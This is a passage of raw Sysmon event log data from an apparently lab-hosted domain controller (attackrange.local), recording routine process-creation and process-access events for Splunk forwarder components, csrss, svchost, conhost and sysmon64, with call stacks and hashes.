13:11:54.317{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-431A-6000-A000-000000009A01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-431A-6000-A000-000000009A01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:54.317{08A6967A-431A-6000-A000-000000009A01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-431B-6000-A100-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-431B-6000-A100-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.930{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-431B-6000-A100-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:55.931{08A6967A-431B-6000-A100-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.994{08A6967A-431C-6000-A200-000000009A01}49244868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-431C-6000-A200-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-431C-6000-A200-000000009A01}4924C:\Program 